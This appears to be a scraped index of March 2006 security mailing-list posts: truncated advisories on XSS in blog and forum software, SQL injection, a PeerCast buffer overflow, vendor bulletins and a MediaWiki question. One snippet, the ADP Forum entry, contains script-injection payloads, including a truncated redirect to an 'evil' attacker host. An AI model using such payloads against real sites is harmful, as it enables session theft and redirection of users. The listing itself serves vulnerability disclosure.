MyBloggie: Multiple XSS Vulnerabilities
2006-03-09 enji seclab tuwien ac at
===========================================================
MyBloggie: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-002, March 9, 2006
===========================================================

DCP Portal: Multiple XSS Vulnerabilities
2006-03-09 enji seclab tuwien ac at
===========================================================
DCP Portal: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-001, March 9, 2006
===========================================================

ADP Forum 2.0,* script İnjection
2006-03-09 liz0 bsdmail com
ADP Forum 2.0,* script İnjection
----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.adp.host.sk/Forum203/
--------------------------------------------------
Post This Code:
<script>alert(/Liz0ziM/)</script>
<script>location.href="http://evil

M-Phorum Cross Site Scripting
2006-03-09 codexploder hotmail com
------------------------------------------------------------------------
-------------
M-Phorum Cross Site Scripting
Site:http://m-phorum.sourceforge.net/site/
Credit : CodeXpLoder'tq
webpage:www.biyosecurity.com
Mail :codexploder (at) linuxmail (dot) org
-----------------------------------------------

INFIGO-2006-03-01: PeerCast streaming server remote buffer overflow
2006-03-09 infocus (infocus infigo hr)
INFIGO IS Security Advisory #INFIGO-2006-03-01
http://www.infigo.hr/
Title: PeerCast streaming server remote buffer overflow
Advisory ID: INFIGO-2006-03-01
Date: 2006-03-08
Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01
Impact: Remote code execution
Risk Level: High
Vulnera

Easy File Sharing Web Server Multiple Vulnerabilities
2006-03-09 revnic gmail com
Easy File Sharing Web Server Multiple Vulnerabilities
Software: Easy File Sharing Web Server
Version: 3.2
Website: http://www.sharing-file.com/
Description: Easy File Sharing Web Server is a Windows program that allows you to host a secure peer-to-peer and web-based file sharing system without

Remote access to NeuSecure/Netcool backend database via web interface credentials leakage
2006-03-08 D.Snezhkov (dsnezhkov gmail com)

[SECURITY] [DSA 989-1] New zoph packages fix SQL injection
2006-03-09 Moritz Muehlenhoff (jmm inutil org)

HYSA-2006-005 WordPress 2.0.1 Remote DoS Exploit
2006-03-08 h4cky0u org gmail com
------------------------------------------------------
HYSA-2006-005 h4cky0u.org Advisory 014
------------------------------------------------------
Date - Wed March 08 2006
TITLE:
======
WordPress 2.0.1 Remote DoS Exploit
SEVERITY:
=========
Medium
SOFTWARE:
=========
Wordpress 2.0.1

nCipher Advisory #14: Presence of flaws in firmware security
2006-03-09 nCipher Support (technotifications us ncipher com)

nCipher Advisory #13: CBC-MAC IV misleading programming interface
2006-03-08 nCipher Support (technotifications us ncipher com)

Re: [waraxe-2006-SA#047] - Evading sql-injection filters in phpNuke 7.8
2006-03-08 omega13a sbcglobal net

nCipher Advisory #12: Insecure Generation of Diffie-Hellman keys
2006-03-08 nCipher Support (technotifications us ncipher com)

18 ways to escalate privileges in Zone Labs ZoneAlarm Security Suite build 6.1.744.000
2006-03-08 Reed Arvin (reedarvin gmail com) (1 replies)
Summary: 18 ways to escalate privileges in Zone Labs ZoneAlarm Security Suite build 6.1.744.000 (http://www.zonelabs.com/)
Details: During Windows startup the TrueVector service (vsmon.exe - an integral piece of most Zone Labs products) is set to startup automatically. The TrueVector service runs u

    Re: 18 ways to escalate privileges in Zone Labs ZoneAlarm Security Suite build 6.1.744.000
    2006-03-09 3APA3A (3APA3A SECURITY NNOV RU)

[ MDKSA-2006:054 ] - Updated kdegraphics packages fixes overflow vulnerabilities
2006-03-08 security mandriva com

Re: a worm for mediaWiki??
2006-03-08 jredmond ymcastlouis org
"vitamona" <vitamona (at) gmail (dot) com> wrote on 03/08/2006 02:40:43 PM:
> The highlight word on the various articles on mediaWiki was replaced
> with strange string like this:
> NaodW29-pre1dc0e53c28ac067d00000016
This is due to changes in PHP 4.4.1 and 5.1.0RC, and was fixed in MediaWiki version 1.5.

a worm for mediaWiki??
2006-03-08 vitamona (vitamona gmail com)
Hi, I've noticed a strange thing on MediaWiki that I used sometimes. The highlight word on the various articles on mediaWiki was replaced with strange string like this: NaodW29-pre1dc0e53c28ac067d00000016
For look this on google see here: http://www.google.com/search?hl=en&lr=&q=NaodW29&btnG=Search

[KAPDA::#32] - d2kBlog 1.0.3 Multiple Vulnerabilities
2006-03-08 3nitro gmail com
KAPDA New advisory
Vulnerable products : d2kBlog <= 1.0.3
Vendor: http://www.d2ksoft.com/
Risk: Medium
Vulnerabilities: SQL_Injection , Script Insertion
Date :
--------------------
Found : 2006/01/01
Vendor Contacted : 2006/01/02
Release Date : 2006/03/08
About D2KBlog :
--------------------
Free

[SECURITY] [DSA 988-1] New squirrelmail packages fix several vulnerabilities
2006-03-08 Moritz Muehlenhoff (jmm debian org)

capi4hylafax insecure manipulation with tmp files
2006-03-07 Javor Ninov (drfrancky securax org)
capi4hylafax suite (http://freshmeat.net/projects/capi4hylafax/ ) is addon for hylafax fax server (http://www.hylafax.org/)
vulnerable: capi4hylafax-01.03.00 /probably others/
in capi4hylafax-01.03.00/src/faxrecv/faxrecv.cpp :
#ifdef GENERATE_DEBUGSFFDATAFILE
dwarning (DebugSffDataFile == 0);

textfileBB <= 1.0 Multiple XSS
2006-03-08 retard 30gigs com
ORIGINAL: http://notlegal.ws/textfilebbmessanger.txt
software: textfileBB
vendors website: http://tfbb.jcink.com/
versions: <= 1.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium
exploit(s): http://example.com/messang

[eVuln] EKINboard 'img' BBCode XSS & Cookie 'username' SQL Injection Vulnerabilities
2006-03-08 alex evuln com
New eVuln Advisory: EKINboard 'img' BBCode XSS & Cookie 'username' SQL Injection Vulnerabilities
http://evuln.com/vulns/88/summary.html
--------------------Summary----------------
eVuln ID: EV0088
Software: EKINboard
Software's Web Site: http://www.ekinboard.com/
Versions: 1.0.3
Critical Level: Mod

[security bulletin] HPSBTU02100 SSRT050979 rev.1 - HP Tru64 UNIX IPSEC/ISAKMP Remote Denial of Service (DoS)
2006-03-08 security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00602119
Version: 1
HPSBTU02100 SSRT050979 rev.1 - HP Tru64 UNIX IPSEC/ISAKMP Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as po

H&R Block contact - SOLVED
2006-03-08 Fixer (fixer gci net)
Thanks to everyone that helped with this one. I was able to get the issue resolved and a patch is forthcoming.
-Fixer
------------------------------------------------------------------------
> *From:* Fixer [mailto:fixer (at) gci (dot) net]
> *Sent:* Tue 2/21/2006 11:27 AM
> *To:* bugtraq@securityfo

[FLSA-2006:176751] Updated gpdf package fixes security issues
2006-03-07 Marc Deslauriers (marcdeslauriers videotron ca)
txtForum: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-003, March 9, 2006
===========================================================